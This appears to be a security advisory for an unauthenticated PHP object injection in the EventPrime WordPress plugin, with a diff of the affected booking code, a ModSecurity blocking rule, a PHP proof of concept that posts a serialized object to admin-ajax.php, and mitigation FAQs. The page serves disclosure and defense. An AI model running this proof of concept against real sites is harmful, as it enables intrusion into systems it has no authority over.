-                update_post_meta( $new_post_id, 'em_id', $new_post_id );
-                update_post_meta( $new_post_id, 'em_event', $event_id );
-                update_post_meta( $new_post_id, 'em_date', current_time( 'timestamp',true ) );
-                update_post_meta( $new_post_id, 'em_user', $user_id );
-                update_post_meta( $new_post_id, 'em_name', $event_name );
-                update_post_meta( $new_post_id, 'em_status', $post_status );
-                update_post_meta( $new_post_id, 'em_payment_method', $payment_method );
-                if(isset($data['ep_gdpr_consent']))
-                {
-                    update_post_meta( $new_post_id, 'ep_gdpr_consent', $data['ep_gdpr_consent'] );
-                    update_post_meta( $new_post_id, 'ep_gdpr_consent_time', current_time('mysql'));
-                }
-                if( isset( $_POST['rid'] ) && ! empty( $_POST['rid'] ) ) {
-                    update_post_meta( $new_post_id, 'em_random_order_id', sanitize_text_field( $_POST['rid'] ) );
-                }
-                // order info
-                $order_info = array();
-                $order_info['tickets']           = json_decode( $data['ep_event_booking_ticket_data'] );
-                $order_info['event_fixed_price'] = ( ! empty( $data['ep_event_booking_event_fixed_price'] ) ? (float)$data['ep_event_booking_event_fixed_price'] : 0.00 );
-                $order_info['booking_total']     = ( ! empty( $data['ep_event_booking_total_price'] ) ? (float)$data['ep_event_booking_total_price'] : 0.00 );
-                $order_info = apply_filters('ep_update_booking_order_info', $order_info, $data);
-                update_post_meta( $new_post_id, 'em_order_info', $order_info );
-                update_post_meta( $new_post_id, 'em_notes', array() );
-                update_post_meta( $new_post_id, 'em_payment_log', array() );
-                update_post_meta( $new_post_id, 'em_booked_seats', array() );
-                update_post_meta( $new_post_id, 'eventprime_updated_pattern',1);
-                $ep_booking_attendee_fields =(isset($data['ep_booking_attendee_fields']))?$sanitizer->sanitize($data['ep_booking_attendee_fields']):array();
-                update_post_meta( $new_post_id, 'em_attendee_names', $ep_booking_attendee_fields );
-                // check for booking fields data
-                $em_booking_fields_data = array();
-                if( ! empty( $data['ep_booking_booking_fields'] ) ) {
-                    $em_booking_fields_data = $data['ep_booking_booking_fields'];
-                }
-                update_post_meta( $new_post_id, 'em_booking_fields_data', $em_booking_fields_data );
-                $order_key = $ep_functions->ep_encrypt_decrypt_pass('encrypt', 'ep_order_'.$new_post_id);
-                update_post_meta( $new_post_id, 'ep_order_key', $order_key );
-
-                do_action( 'ep_after_booking_created', $new_post_id, $data );
-
-                // if booking total is 0 then confirm booking
-                if( $payment_method == 'none' && empty( $order_info['booking_total'] ) ){
-                    $data['payment_gateway'] = 'none';
-                    $data['payment_status']  = 'completed';
-                    $data['total_amount']    = $order_info['booking_total'];
-                    $booking_controller      = new EventPrime_Bookings;
-                    $booking_controller->confirm_booking( $new_post_id, $data );
-                }
-
-                $response                 = new stdClass();
-                $response->order_id       = $new_post_id;
-                $response->payment_method = $payment_method;
-                $response->post_status    = $post_status;
-
-                // Items for paypal order
-                $items = [];
-                $items = $ep_functions->ep_get_paypal_order_items($data);
-                $items = apply_filters('ep_extend_paypal_order_items', $items, $data);
-                $response->items_total = $items['items_total'];
-                $response->items = $items['items'];
-
-                $response->booking_total  = round( (float)$data['ep_event_booking_total_price'], 2 );
-                $response->discount_total = (isset($data['ep_event_booking_total_discount'])) ? round( (float)$data['ep_event_booking_total_discount'], 2 ) : 0;
-                // $response->booking_total  = (float)$data['ep_event_booking_total_price'];
-                // $response->discount_total = (isset($data['ep_event_booking_total_discount']))?(float)$data['ep_event_booking_total_discount']:0;
-
-                $response->item_total     = (float)$data['ep_event_booking_total_tickets'];
-
-                // $redirect                 = esc_url( add_query_arg( array( 'order_id' => $new_post_id ), get_permalink( ep_get_global_settings( 'booking_details_page' ) ) ) );
-                $redirect                 = add_query_arg( array( 'order_id' => $new_post_id ), esc_url( get_permalink( $ep_functions->ep_get_global_settings( 'booking_details_page' ) ) ) );
-                $response->redirect       = apply_filters( 'ep_booking_redirection_url', $redirect, $new_post_id );
-                wp_send_json_success( $response );
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /**
-     * Delete booking timer data from option table
-     */
-    public function booking_timer_complete() {
-        check_ajax_referer( 'flush_event_booking_timer_nonce', 'security' );
-        delete_option( 'ep_event_booking_timer_start' );
-        $booking_data = json_decode( stripslashes( $_POST['booking_data'] ) );
-
-        do_action( 'ep_event_booking_timer_finished', $booking_data );
-        wp_send_json_success(true);
-    }
-
-    /**
-     * Method call from paypal approval
-     */
-    public function paypal_sbpr() {
-        if ( ! check_ajax_referer( 'flush_event_booking_timer_nonce', 'security', false ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( empty( $_POST ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Data Not Found', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $ep_functions  = new Eventprime_Basic_Functions;
-        $data          = $ep_functions->ep_sanitize_input( $_POST['data'] ?? array() );
-        if ( ! is_array( $data ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Invalid payment data.', 'eventprime-event-calendar-management' ) ) );
-        }
-        $booking_id    = absint( $_POST['order_id'] ?? 0 );
-
-        $payment_amount = $data['purchase_units'][0]['amount']['value'] ?? '';
-
-        if ( empty( $booking_id ) || empty( $data ) || $payment_amount === '' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Invalid payment data.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $order_info = maybe_unserialize( get_post_meta( $booking_id, 'em_order_info', true ) );
-        $booking_status = get_post_meta( $booking_id, 'em_status', true );
-        $booking_user = absint( get_post_meta( $booking_id, 'em_user', true ) );
-
-        if ( ! empty( $booking_user ) && get_current_user_id() !== $booking_user ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to confirm this booking.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( empty( $order_info['booking_total'] ) || $order_info['booking_total'] != $payment_amount ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Payment amount mismatch.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        if ( ! empty( $booking_status ) && strtolower( $booking_status ) === 'completed' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Booking already completed.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $payment_status = isset( $data['status'] ) ? strtolower( $data['status'] ) : '';
-        if ( empty( $payment_status ) ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Missing payment status.', 'eventprime-event-calendar-management' ) ) );
-        }
-        if ( $payment_status !== 'completed' ) {
-            wp_send_json_error( array( 'error' => esc_html__( 'Payment not completed.', 'eventprime-event-calendar-management' ) ) );
-        }
-
-        $data['payment_gateway'] = 'paypal';
-        $data['payment_status']  = $payment_status;
-        $data['total_amount']    = $payment_amount;
-        $data['currency']        = $ep_functions->ep_get_global_settings('currency');
-
-        $booking_controller = new EventPrime_Bookings;
-        $booking_controller->confirm_booking( $booking_id, $data );
-
-        $redirect   = add_query_arg( array( 'order_id' => $booking_id ), esc_url( get_permalink( $ep_functions->ep_get_global_settings( 'booking_details_page' ) ) ) );
-        $return_url = apply_filters( 'ep_booking_redirection_url', $redirect, $booking_id );
-
-        $response = array( 'status' => 'success', 'redirect' => $return_url );
-        wp_send_json_success( $response );
-    }
-
-    /**
-     * Booking cancellation action
-     */
-    public function event_booking_cancel() {
-        if( wp_verify_nonce( $_POST['security'], 'event-booking-cancellation-nonce' ) ) {
-            if( isset( $_POST['booking_id'] ) ) {
-                $booking_id = absint( $_POST['booking_id'] );
-                if( ! empty( $booking_id ) ) {
-                    if (is_user_logged_in()) {
-                        $current_user_id = get_current_user_id();
-                        $booking_controller = new EventPrime_Bookings;
-                        $notification = new EventM_Notification_Service();
-                        $booking = $booking_controller->load_booking_detail( $booking_id );
-                        if( ! empty( $booking ) && $booking->em_user==$current_user_id) {
-                            if ( $booking->em_status == 'cancelled' ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'The booking is already cancelled', 'eventprime-event-calendar-management' ) ) );
-                            }
-                            if( $booking->em_status == 'refunded' ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'The booking can not be cancelled. The amount is already refunded', 'eventprime-event-calendar-management' ) ) );
-                            }
-                            if( ! empty( $booking->em_user ) && get_current_user_id() != $booking->em_user ) {
-                                wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to cancel this booking', 'eventprime-event-calendar-management' ) ) );
-                            }
-
-                            // cancel the booking
-                            update_post_meta( $booking->em_id, 'em_status', 'cancelled' );
-
-                            $booking_controller->update_status( $booking_id, 'cancelled' );
-
-                            // send cancellation mail
-                            $notification->booking_cancel( $booking_id );
-
-                            do_action( 'ep_after_booking_cancelled', $booking );
-
-                            wp_send_json_success( array( 'message' => esc_html__( 'Booking Cancelled Successfully', 'eventprime-event-calendar-management' ) ) );
-                        } else{
-                            wp_send_json_error( array( 'error' => esc_html__( 'Invalid Data', 'eventprime-event-calendar-management' ) ) );
-                        }
-                    } else{
-                        wp_send_json_error( array( 'error' => esc_html__( 'You are not allowed to cancel this booking', 'eventprime-event-calendar-management' ) ) );
-                    }
-                }
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /*
-     * Add booking Notes
-     */
-    public function booking_add_notes(){
-        if (!isset($_POST['security']) || !wp_verify_nonce($_POST['security'], 'ep_booking_nonce')) {
-            wp_die('Security check failed');
-        }
-        if( isset( $_POST['booking_id'] ) && isset($_POST['note']) && !empty(trim($_POST['note'])) && current_user_can('manage_options')) {
-            $booking_id = absint( $_POST['booking_id'] );
-            $note = sanitize_text_field($_POST['note']);
-            $booking_controller = new EventPrime_Bookings();
-            $response = $booking_controller->add_notes( $booking_id, $note);
-            wp_send_json_success( $response );
-        }else{
-            wp_send_json_error();
-        }
-    }
-
-    /**
-     * Event wishlist action
-     */
-    public function event_wishlist_action() {
-        if( isset($_POST['security']) && wp_verify_nonce( $_POST['security'], 'event-wishlist-action-nonce' ) ){
-            if( isset( $_POST['event_id'] ) && ! empty( $_POST['event_id'] ) ) {
-                $event_id = absint( $_POST['event_id'] );
-                $user_id = get_current_user_id();
-                if( empty( $user_id ) ) {
-                    wp_send_json_error( array( 'error' => esc_html__( 'You need to login to add event to wishlist', 'eventprime-event-calendar-management' ) ) );
-                }
-                $ep_functions = new Eventprime_Basic_Functions;
-                $single_event = $ep_functions->get_single_event( $event_id );
-                if( empty( $single_event ) ) {
-                    wp_send_json_error( array( 'error' => esc_html__( 'Event Not Found', 'eventprime-event-calendar-management' ) ) );
-                }
-                // get user wishlist meta
-                $wishlist_meta = get_user_meta( $user_id, 'ep_wishlist_event', true );
-                if( empty( $wishlist_meta ) ) { // if empty the add event id
-                    $wishlist_array = array( $event_id => 1 );
-                    update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_array );
-                    wp_send_json_success( array( 'action' => 'add', 'title'=> $ep_functions->ep_global_settings_button_title( 'Remove From Wishlist' ), 'message' => esc_html__( 'Event added successfully into wishlist', 'eventprime-event-calendar-management' ) ) );
-                } else{
-                    // if already added then remove the event from wishlist
-                    if( array_key_exists( $event_id, $wishlist_meta ) ) {
-                        unset( $wishlist_meta[$event_id] );
-                        update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_meta );
-                        wp_send_json_success( array( 'action' => 'remove', 'title'=> $ep_functions->ep_global_settings_button_title( 'Add To Wishlist' ), 'message' => esc_html__( 'Event removed successfully from wishlist', 'eventprime-event-calendar-management' ) ) );
-                    } else{
-                        $wishlist_meta[$event_id] = 1;
-                        update_user_meta( $user_id, 'ep_wishlist_event', $wishlist_meta );
-                        wp_send_json_success( array( 'action' => 'add', 'title'=> $ep_functions->ep_global_settings_button_title( 'Remove From Wishlist' ), 'message' => esc_html__( 'Event added successfully into wishlist', 'eventprime-event-calendar-management' ) ) );
-                    }
-                }
-            } else{
-                wp_send_json_error( array( 'error' => esc_html__( 'Wrong data.', 'eventprime-event-calendar-management' ) ) );
-            }
-        } else{
-            wp_send_json_error( array( 'error' => esc_html__( 'Security check failed. Please refresh the page and try again later.', 'eventprime-event-calendar-management' ) ) );
-        }
-    }
-
-    /**
-     * Submit the frontend event submission form
-     */
-    public function save_frontend_event_submission() {
-        if( wp_verify_nonce( $_POST['security'], 'ep-frontend-event-submission-nonce' ) ) {
-            global $wpdb;
-            parse_str( wp_unslash( $_POST['data'] ), $data );
-            $ep_functions = new Eventprime_Basic_Functions;
-            $notifications = new EventM_Notification_Service;
-            $sanitizer = new EventPrime_sanitizer;
-            $em_name = htmlspecialchars_decode( sanitize_text_field( $data['em_name'] ) );
-
-            $result = array( 'success' => 1, 'msg' => '' );
-            $checkpoint = apply_filters('ep_handle_frontend_submission_additional_check',$result, $data);
-            if(isset($checkpoint['success']) && empty($checkpoint['success'])){
-                wp_send_json_error( array( 'error' =>  $checkpoint['msg']) );
-                die();
-            }
-            if( empty( $em_name ) ) {
-                wp_send_json_error( array( 'error' => esc_html__( 'Event Name cannot be empty.', 'eventprime-event-calendar-management' ) ) );
-            }
-
-            $guest_submission = $ep_functions->ep_get_global_settings('allow_submission_by_anonymous_user');
-            if( empty( $guest_submission ) && empty( get_current_user_id() ) ) {
-                wp_send_json_error( array( 'error' => esc_html__( 'User login required to submit event.', 'eventprime-event-calendar-management' ) ) );
-            }
-
-            if(empty($guest_submission)){
-                $hasUserRestriction = 0;
-                $frontend_submission_roles = (array) $ep_functions->ep_get_global_settings( 'frontend_submission_roles' );
-                if( ! empty( $frontend_submission_roles ) ) {
-                    $user = wp_get_current_user();
-                    foreach ( $user->roles as $key => $value ) {
-                        if( in_array( $value, $frontend_submission_roles ) ) {
-                            $hasUserRestriction = 1;
-                            break;
-                        }
-                    }
-                }else{
-                    $hasUserRestriction = 1;
-                }
-                if(empty($hasUserRestriction)){
-                       wp_send_json_error( array( 'error' => $ep_functions->ep_get_global_settings('ues_restricted_submission_message') ) );
-                }
-            }
-
-
-
-            $post_status = $ep_functions->ep_get_global_settings( 'ues_default_status' );
-            if( empty( $post_status ) ) {
-                $post_status = 'draft';
-            }
-
-            $event_description = wp_kses_post( stripslashes( $data['em_descriptions'] ) );
-
-            if( isset( $data['event_id'] ) && ! empty( $data['event_id'] ) ) {
-                $post_id = $data['event_id'];
-                if(empty(get_post($post_id)) || get_post_type($post_id) != 'em_event' ){
-                    wp_send_json_error( array( 'error' => esc_html__( 'There is some issue with event. Please try later.', 'eventprime-event-calendar-management' ) ) );
-                }
-                if(!empty($guest_submission) && get_post_meta($post_id, 'em_user_submitted', true) != get_current_user_id()){
-                       wp_send_json_error( array( 'error' => esc_html__( 'Event does not belong to you.', 'eventprime-event-calendar-management' ) ) );
-
-                }
-                $post_update = array(
-                    'ID'         => $post_id,
-                    'post_title' => $em_name,
-                    'post_content' => $event_description,
-                );
-                wp_update_post( $post_update );
-            }else{
-                $post_id = wp_insert_post(array (
-                    'post_type' => 'em_event',
-                    'post_title' => $em_name,
-                    'post_content' => $event_description,
-                    'post_status' => $post_status,
-                    'post_author' => get_current_user_id(),
-                ));
-            }
-
-            update_post_meta( $post_id, 'em_frontend_submission', 1 );
-            update_post_meta( $post_id, 'em_user_submitted', 1 );
-            update_post_meta( $post_id, 'em_user', get_current_user_id() );
-
-            update_post_meta( $post_id, 'em_id', $post_id );
-            update_post_meta( $post_id, 'em_name', $em_name );
-
-            $event_data = new stdClass();
-            $thumbnail_id = isset( $data['attachment_id'] ) ? $data['attachment_id'] : '';
-            set_post_thumbnail( $post_id, $thumbnail_id );
-
-            $em_start_date = isset( $data['em_start_date'] ) ? $ep_functions->ep_date_to_timestamp( sanitize_text_field( $data['em_start_date'] ) ) : '';
-            update_post_meta($post_id, 'em_start_date', $em_start_date);
-
-            $em_start_time = isset( $data['em_start_time'] ) ? sanitize_text_field( $data['em_start_time'] ) : '';
-            update_post_meta($post_id, 'em_start_time', $em_start_time);
-
-            $em_hide_event_start_time = isset( $data['em_hide_event_start_time'] ) && !empty($data['em_hide_event_start_time'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_start_time', $em_hide_event_start_time );
-
-            $em_hide_event_start_date = isset( $data['em_hide_event_start_date'] ) && !empty( $data['em_hide_event_start_date'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_start_date', $em_hide_event_start_date );
-
-            $em_end_date = isset( $data['em_end_date'] ) ? $ep_functions->ep_date_to_timestamp( sanitize_text_field( $data['em_end_date'] ) ) : $em_start_date;
-            update_post_meta($post_id, 'em_end_date', $em_end_date);
-
-            $em_end_time = isset( $data['em_end_time'] ) ? sanitize_text_field( $data['em_end_time'] ) : '';
-            update_post_meta($post_id, 'em_end_time', $em_end_time);
-
-            $em_hide_event_end_time = isset( $data['em_hide_event_end_time'] ) && !empty($data['em_hide_event_end_time']) ? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_event_end_time', $em_hide_event_end_time );
-
-            $em_hide_end_date = isset( $data['em_hide_end_date'] ) && !empty( $data['em_hide_end_date'] )? 1 : 0;
-            update_post_meta( $post_id, 'em_hide_end_date', $em_hide_end_date );
-
-            $em_all_day = isset( $data['em_all_day'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_all_day', $em_all_day );
-            // if event is all day then end date will be same as start date
-            if( $em_all_day == 1 ) {
-                $em_end_date = $em_start_date;
-                update_post_meta( $post_id, 'em_end_date', $em_end_date );
-                $em_start_time = '12:00 AM'; $em_end_time = '11:59 PM';
-                update_post_meta( $post_id, 'em_start_time', $em_start_time );
-                update_post_meta( $post_id, 'em_end_time', $em_end_time );
-            }
-            // update start and end datetime meta
-            $ep_date_time_format = 'Y-m-d';
-            $start_date = get_post_meta( $post_id, 'em_start_date', true );
-            $start_time = get_post_meta( $post_id, 'em_start_time', true );
-            $merge_start_date_time = $ep_functions->ep_datetime_to_timestamp( $ep_functions->ep_timestamp_to_date( $start_date, 'Y-m-d', 1 ) . ' ' . $start_time, $ep_date_time_format, '', 0, 1 );
-            if( ! empty( $merge_start_date_time ) ) {
-                update_post_meta( $post_id, 'em_start_date_time', $merge_start_date_time );
-            }
-            $end_date = get_post_meta( $post_id, 'em_end_date', true );
-            $end_time = get_post_meta( $post_id, 'em_end_time', true );
-            $merge_end_date_time = $ep_functions->ep_datetime_to_timestamp( $ep_functions->ep_timestamp_to_date( $end_date, 'Y-m-d', 1 ) . ' ' . $end_time, $ep_date_time_format, '', 0, 1 );
-            if( ! empty( $merge_end_date_time ) ) {
-                update_post_meta( $post_id, 'em_end_date_time', $merge_end_date_time );
-            }
-
-            $em_event_date_placeholder = isset( $data['em_event_date_placeholder'] ) ? sanitize_text_field( $data['em_event_date_placeholder'] ) : '';
-            update_post_meta( $post_id, 'em_event_date_placeholder', $em_event_date_placeholder );
-            $em_event_date_placeholder_custom_note = '';
-            if( ! empty( $em_event_date_placeholder ) && $em_event_date_placeholder == 'custom_note' ) {
-                $em_event_date_placeholder_custom_note = sanitize_text_field( $data['em_event_date_placeholder_custom_note'] );
-            }
-            update_post_meta( $post_id, 'em_event_date_placeholder_custom_note', $em_event_date_placeholder_custom_note );
-
-            // add event more dates
-            $em_event_more_dates = isset( $data['em_event_more_dates'] ) ? 1 : 0;
-            update_post_meta( $post_id, 'em_event_more_dates', $em_event_more_dates );
-            $event_more_dates = array();
-            if( isset( $data['em_event_more_dates'] ) && !empty( $data['em_event_more_dates'] ) ) {
-                if( isset( $data['em_event_add_more_dates'] ) && count( $data['em_event_add_more_dates'] ) > 0 ) {
-                    foreach( $data['em_event_add_more_dates'] as $key => $more_dates ) {
-                        $new_date = array();
-                        $new_date['uid']    = absint( $more_dates['uid'] );
-                        $new_date['date']   = $ep_functions->ep_date_to_timestamp( sanitize_text_field( $more_dates['date'] ) );
-                        $new_date['time']   = sanitize_text_field( $more_dates['time'] );
-                        $new_date['label']  = sanitize_text_field( $more_dates['label'] );
-                        $event_more_dates[] = $new_date;
-                    }
-                }
-            }
-		    update_post_meta( $post_id, 'em_event_add_more_dates', $event_more_dates );
-
-            // booking & tickets
-            $em_enable_booking = isset( $data['em_enable_booking

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-24378
# Blocks unauthenticated PHP object injection via EventPrime AJAX handler
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:100024378,phase:2,deny,status:403,chain,msg:'CVE-2026-24378: EventPrime PHP Object Injection Attempt',severity:'CRITICAL',tag:'CVE-2026-24378',tag:'WordPress',tag:'EventPrime',tag:'PHP-Object-Injection'"
  SecRule ARGS_POST:action "@streq save_event_booking" "chain"
    SecRule ARGS_POST:ep_event_booking_ticket_data "@rx (?:O:d+:"[^"]+":|C:d+:"[^"]+":|a:d+:{[^}]*s:d+:"[^"]+";(?:O|C):)" 
      "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,setvar:'tx.cve_2026_24378_score=+1',setvar:'tx.anomaly_score=+%{tx.critical_anomaly_score}'"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-24378 - EventPrime – Events Calendar, Bookings and Tickets <= 4.2.8.0 - Unauthenticated PHP Object Injection

<?php
/**
 * DISCLAIMER: For authorized security testing only.
 * This PoC demonstrates the attack vector, not a full exploit chain.
 */

$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// Craft malicious serialized object (example using common WordPress gadget)
// Note: Actual POP chain depends on installed plugins/themes
$malicious_object = 'O:8:"stdClass":1:{s:4:"test";s:10:"injection"}';

// Build ticket data structure containing serialized object
$ticket_data = array(
    array(
        'id' => 1,
        'seats' => array(
            array(
                'area_id' => '1',
                'seat_data' => array(
                    array(
                        'uid' => $malicious_object  // Injected serialized object
                    )
                )
            )
        )
    )
);

$post_data = array(
    'action' => 'save_event_booking',
    'ep_save_event_booking_nonce' => 'dummy_nonce',  // Nonce bypass in vulnerable versions
    'ep_event_booking_event_id' => '1',
    'ep_event_booking_ticket_data' => json_encode($ticket_data),
    'ep_event_booking_event_fixed_price' => '0'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/x-www-form-urlencoded'));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response: $responsen";

// Check for deserialization indicators
if (strpos($response, 'unserialize') !== false || strpos($response, 'object') !== false) {
    echo "[+] Potential vulnerability detectedn";
} else {
    echo "[-] No obvious indicators foundn";
}
?>

Frequently Asked Questions

What is CVE-2026-24378?
Understanding the vulnerability
CVE-2026-24378 is a high-severity vulnerability in the EventPrime Events Calendar, Bookings and Tickets plugin for WordPress, affecting versions up to 4.2.8.0. It allows unauthenticated attackers to exploit PHP Object Injection through deserialization of untrusted input, potentially leading to arbitrary file deletion or remote code execution.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability resides in the `save_event_booking()` method, which processes user-submitted booking data without proper validation. Attackers can send a specially crafted POST request to inject malicious PHP objects, which can be executed if a suitable gadget chain exists in the environment.
Who is affected by this vulnerability?
Identifying vulnerable systems
All WordPress sites using the EventPrime plugin versions 4.2.8.0 and earlier are at risk. Administrators should check their installed plugin version against the patched version 4.2.8.1 to determine if they are vulnerable.
How can I check if my site is vulnerable?
Version verification process
To check if your site is vulnerable, navigate to the plugins section in your WordPress admin dashboard and locate the EventPrime plugin. Verify the version number; if it is 4.2.8.0 or earlier, your site is at risk.
How can I fix this vulnerability?
Applying the necessary update
The vulnerability can be mitigated by updating the EventPrime plugin to version 4.2.8.1 or later, where the issue has been patched. Always ensure to back up your site before applying updates.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the EventPrime plugin until a patch can be applied. Additionally, review your site’s security settings and restrict access to the admin-ajax.php endpoint.
What does a CVSS score of 8.1 indicate?
Understanding the severity rating
A CVSS score of 8.1 indicates a high severity vulnerability, meaning that successful exploitation could lead to significant impact, such as data loss or unauthorized access. Administrators should prioritize addressing this vulnerability.
What is a PHP Object Injection vulnerability?
Definition and implications
PHP Object Injection vulnerabilities occur when an application deserializes untrusted data, allowing attackers to inject malicious objects. This can lead to various attacks, including remote code execution, if a suitable exploit chain is available.
What is a Proof of Concept (PoC)?
Demonstrating the vulnerability
A Proof of Concept (PoC) is a demonstration that shows how the vulnerability can be exploited. The provided PoC illustrates how an attacker can craft a malicious payload to exploit the vulnerability in the EventPrime plugin.
What are the potential risks if this vulnerability is exploited?
Consequences of exploitation
Exploitation of this vulnerability could allow attackers to delete files, access sensitive data, or execute arbitrary code on the server. This poses a significant risk to the integrity and confidentiality of the affected WordPress site.
How can I protect my WordPress site from such vulnerabilities?
Best practices for WordPress security
To protect your WordPress site, regularly update all plugins and themes, use security plugins to monitor for vulnerabilities, and implement strong access controls. Regular security audits can also help identify and mitigate risks.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations